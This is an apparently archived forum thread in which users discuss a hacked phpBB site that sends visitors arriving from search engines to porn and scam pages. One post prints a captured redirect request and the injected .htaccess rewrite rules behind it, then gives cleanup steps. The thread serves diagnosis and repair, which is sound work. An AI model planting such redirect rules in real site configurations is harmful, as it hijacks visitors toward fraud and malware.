Page 1 of 1

Google Searches Hijacked

Posted: Sat Jun 18, 2016 10:17 pm
by ManagedMan
Looks like the hijackers are at it again.

When I do a Google search for "Chastity Forums" the two top link results appear to be to www.chastityforums.com, but when clicked take the browser to a variety of porn sites.

Re: Google Searches Hijacked

Posted: Tue Jun 21, 2016 1:00 pm
by Minas_Bitch
I get this when I am just browsing the site sometimes as well. Has the site been hacked?

Re: Google Searches Hijacked

Posted: Wed Jun 22, 2016 12:12 pm
by TwistedMister
An announcement has been in the "Announcements" section since April. See there? At the top of the forum board/thread lists? Where it says "Announcements"?

:facepalm:

Yes, there is an issue, but we seem to be low on the list of getting things fixed.

As a work-around, instead of left-clicking on the search links, right-click and copy the address, and paste it into the browser address bar. That will get you there correctly.

Re: Google Searches Hijacked

Posted: Thu Jun 23, 2016 8:50 am
by beheld
I doubt this will be fixed anytime soon. Multiple people have offered to help, but the admin seem to be fine with it because they have a workaround they use. If you want to use the site, install a plugin like "referer control" and block the HTTP referer for the site. No need for right clicking or anything.

I'm not sure why the admins haven't fixed the issue. I know I've seen several comments from folks that sound competent enough to fix the problem. It should be just a matter of finding the hacked code and removing it. Downloading the code from the server and comparing it to the stock phpbb code would probaby find the problem. Could be something that's been added to the .htaccess file. It could be something injected into the database but that's more unlikely.

Re: Google Searches Hijacked

Posted: Sun Jul 31, 2016 7:31 am
by TwistedMister
woodenturner wrote:... Could be something that's been added to the .htaccess file...
After a bunch of looking and testing, I believe you hit the nail on the head with the .htaccess file.

----------------------------------------------------------------------------------------
A GET request is sent to 104.131.131.106:80

{request header}
Host: top-24h-can-store.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: -http://top-24h-can-store.com/redirect.php?z=viagra
Connection: keep-alive
The remote host sets a 302 status (temporary redirect)

{response header}
Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html
Date: Sat, 30 Jul 2016 12:01:41 GMT
Keep-Alive: timeout=5, max=100
Location: -http://1empiredirect.com/redirect?aff_i ... uid%3D2382
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: visited=1; expires=Thu, 04-Aug-2016 12:01:41 GMT; Max-Age=432000
X-Powered-By: PHP/5.5.9-1ubuntu4.3
And this is where everybody gets sent off to the porn and dating sites, and, eventually, if they try to back out instead of just closing the browser or right-clicking the 'back' button to get back to a point *before* the redirect, gets the fake computer virus warning with the scam 'tech support' phone number.

Tom, you need to ftp into the server and download the .htaccess file, it should be in the root directory and may be 'hidden'. The .htaccess file is an Apache system file, you may need to select something like "show hidden files" when you open your file manager. Once you locate the file check the content for code that looks like this:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ excrescent-interfacer.php?$1 [L]

and

RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|Seznam|seznam)
RewriteRule . http: // top-24h-can-store . com /redirect.php?z=viagra [L]
There may be a "decoy" file, htaccess or .taccess to confuse the real file, and when you check the contents be sure you are scrolling all the way to the end of the file as hackers may add 100s of blank lines before any malicious directives.

You will need to clean up the .htaccess file and remove any "rogue" php files (if any, but I don't think there are, I think they keep the scripts on the other servers) to clean up the hack.

All you should have to do is delete that code as above, and the blank lines, save the file and then upload it back to the server---> make sure to *overwrite* the old .htaccess with the new one you just edited.

Once you've done this, the problem *should* be solved...except you'll need to change the login and password, it is obviously compromised.